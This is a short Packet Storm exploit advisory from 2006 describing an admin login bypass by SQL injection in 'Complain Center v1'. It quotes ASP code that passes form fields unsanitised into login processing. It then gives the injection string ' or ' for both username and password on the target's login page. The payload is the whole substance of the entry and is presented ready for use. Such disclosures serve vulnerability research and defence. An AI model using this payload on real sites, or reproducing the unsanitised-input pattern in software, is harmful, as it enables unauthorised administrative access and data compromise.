ccv1.txt

2006-09-16T00:00:00
ID PACKETSTORM:50096
Type packetstorm
Reporter ajann
Modified 2006-09-16T00:00:00

Description

                                        
                                            `ENGLISH  
  
# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection  
  
# Author : ajann  
  
# Exploit;  
  
[CODE]  
  
loginprocess.asp:  
..  
...  
dim varUser  
dim varPass  
varUser=Request.Form("TxtUser") No Secure : )  
varPass=Request.Form("TxtPass") No Secure : )  
..  
...  
  
//Before join login page  
http://[target]/[path]/login.asp  
  
Username : ' or '  
Password : ' or ' and Login Ok  
  
# ajann,Turkey  
`